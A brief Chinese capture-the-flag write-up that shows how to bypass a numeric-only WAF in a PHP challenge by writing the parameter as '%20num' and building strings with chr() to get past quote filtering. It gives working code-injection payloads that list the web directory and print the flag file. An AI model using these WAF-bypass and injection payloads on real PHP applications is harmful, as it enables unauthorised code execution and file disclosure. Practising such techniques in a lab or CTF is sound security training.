有waf,不能出现非数字参数值。使用%20num可以绕过waf(Abusing PHP query string parser to bypass IDS, IPS, and WAF (secjuice.com))
过滤了单双引号,可以用chr()函数构造字符串
?%20num=var_dump(scandir(chr(46)))
?%20num=show_source(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))使用show_source函数查看文件得flag
